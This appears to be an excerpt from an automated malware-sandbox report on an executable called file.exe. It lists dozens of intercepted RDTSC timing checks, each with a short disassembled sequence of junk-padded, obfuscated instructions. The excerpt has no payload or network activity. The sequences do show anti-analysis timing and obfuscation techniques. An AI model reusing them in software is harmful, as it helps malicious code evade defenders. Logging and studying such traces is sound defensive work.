                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9BC88 second address: F9BC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9BC8E second address: F9BCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F389C83839Ch 0x0000000c push ecx 0x0000000d jc 00007F389C838396h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ecx 0x00000016 popad 0x00000017 push ebx 0x00000018 jmp 00007F389C83839Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E657 second address: F9E65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E65C second address: F9E661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E661 second address: F9E68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jno 00007F389CFCC954h 0x00000014 pushad 0x00000015 jl 00007F389CFCC946h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9EBF5 second address: F9EC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007F389C8383A4h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F389C838396h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F1DA second address: F9F235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC94Fh 0x00000009 popad 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F389CFCC948h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, 0DFC4B68h 0x0000002b xor edi, 376E0B04h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F389CFCC957h 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F235 second address: F9F23A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F38C second address: F9F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F394 second address: F9F3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007F389C838398h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F5F5 second address: F9F5FF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F735 second address: F9F750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F389C83839Fh 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F750 second address: F9F774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389CFCC957h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F774 second address: F9F786 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F389C838396h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0614 second address: FA061A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA061A second address: FA0621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1783 second address: FA1789 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1789 second address: FA178E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA223C second address: FA2264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jno 00007F389CFCC946h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2264 second address: FA22A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F389C838398h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D19E1h], eax 0x00000027 push 00000000h 0x00000029 sub edi, 3912168Ah 0x0000002f push 00000000h 0x00000031 mov edi, ecx 0x00000033 push eax 0x00000034 push esi 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA22A4 second address: FA22AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2CA3 second address: FA2CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2CA7 second address: FA2CB5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2CB5 second address: FA2CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37AA second address: FA37AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37AF second address: FA37C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F389C83839Dh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37C7 second address: FA37CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37CB second address: FA37D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37D5 second address: FA37D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA37D9 second address: FA383C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F389C838398h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+1248BC0Fh], ecx 0x0000002d push 00000000h 0x0000002f and si, CC8Dh 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 jc 00007F389C838398h 0x0000003c pushad 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F389C8383A3h 0x00000045 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4383 second address: FA43A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F389CFCC94Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F389CFCC94Ah 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E07 second address: FA5E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E0F second address: FA5E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E15 second address: FA5E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5E1A second address: FA5E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F389CFCC946h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F645A2 second address: F645C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F389C8383A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6480 second address: FA6484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6484 second address: FA64E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F389C838398h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2F1Dh], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F389C838398h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 push edi 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d pop edi 0x0000004e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA35C4 second address: FA35D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F389CFCC946h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DB9 second address: FA8DBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DBE second address: FA8DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DCC second address: FA8DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8DE5 second address: FA8DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9DE9 second address: FA9DFE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jc 00007F389C8383B2h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9ED9 second address: FA9EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389CFCC959h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE0C8 second address: FAE0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F389C838396h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE0D5 second address: FAE0D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE0D9 second address: FAE147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bl, A7h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F389C838398h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 call 00007F389C8383A2h 0x0000002d jmp 00007F389C8383A9h 0x00000032 pop ebx 0x00000033 add ebx, 398C1494h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c mov edi, dword ptr [ebp+122D3921h] 0x00000042 pop edi 0x00000043 xchg eax, esi 0x00000044 push ebx 0x00000045 push esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE147 second address: FAE158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F389CFCC946h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE158 second address: FAE162 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB075E second address: FB0762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0762 second address: FB0783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2D67 second address: FB2D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3DC6 second address: FB3DE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F389C83839Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3DE9 second address: FB3E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or bl, FFFFFFBCh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F389CFCC948h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 jbe 00007F389CFCC94Bh 0x0000002d mov ebx, 3CF218BCh 0x00000032 push 00000000h 0x00000034 jne 00007F389CFCC94Ch 0x0000003a mov dword ptr [ebp+122D2A58h], ecx 0x00000040 xchg eax, esi 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F389CFCC94Ch 0x00000049 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3E46 second address: FB3E6B instructions: 0x00000000 rdtsc 0x00000002 js 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F389C8383A7h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3E6B second address: FB3E75 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F389CFCC94Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB4E7C second address: FB4E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jnc 00007F389C838398h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8F2B second address: FA8F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8F31 second address: FA8F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC274 second address: FAC27E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F389CFCC946h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC27E second address: FAC282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA05F second address: FAA065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA144 second address: FAA148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6E76 second address: FB6E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6E7A second address: FB6E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F389C838396h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7E0C second address: FB7E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE351 second address: FAE35B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE35B second address: FAE35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB098E second address: FB09B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A6h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007F389C83839Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3FE7 second address: FB4000 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F389CFCC94Bh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB502F second address: FB5033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB708A second address: FB7090 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F53 second address: FB7F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C83839Dh 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F65 second address: FB7F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F75 second address: FB8004 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+122D1C71h], edx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jmp 00007F389C83839Dh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007F389C838398h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 00000016h 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b call 00007F389C8383A2h 0x00000040 mov bh, ch 0x00000042 pop ebx 0x00000043 mov eax, dword ptr [ebp+122D0BE5h] 0x00000049 push FFFFFFFFh 0x0000004b jmp 00007F389C8383A6h 0x00000050 push eax 0x00000051 mov edi, dword ptr [ebp+122D2F70h] 0x00000057 pop ebx 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e jl 00007F389C838396h 0x00000064 popad 0x00000065 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8004 second address: FB801D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389CFCC955h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB801D second address: FB802B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB802B second address: FB804F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F389CFCC958h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA5F2 second address: FBA619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007F389C8383BAh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F389C8383A8h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA619 second address: FBA61D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA75F second address: FBA763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
